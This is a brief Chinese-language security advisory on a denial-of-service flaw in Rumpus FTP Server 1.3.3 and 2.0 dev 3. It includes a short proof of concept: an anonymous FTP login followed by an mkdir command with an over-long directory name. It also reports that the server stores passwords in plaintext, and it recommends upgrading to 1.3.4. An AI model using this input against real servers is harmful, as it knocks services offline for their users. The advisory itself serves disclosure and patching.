涉及程序: Rumpus FTP Server 详细: 恶意构造目录名导致 Rumpus FTP 服务器拒绝服务漏洞 近日发现 Maxum ( http://www.maxum.com ) Rumpus FTP 服务器存在拒绝服务漏洞。攻击者登录进入该服务器后,如果试图建立一个超过65个字符长度的目录名,则会导致该服务器停止响应。 另外,该系统中的口令文件 \\\`Rumpus User Database\\ 是以明文形式存放口令的。 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负 ftp 192.168.0.1 user anonymous pass an@nymo.us mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa 受影响系统: v1.3.3, 2.0 dev 3(MacOS 8.6, 9.1) 解决方案: 请用户采用1.3.4 版本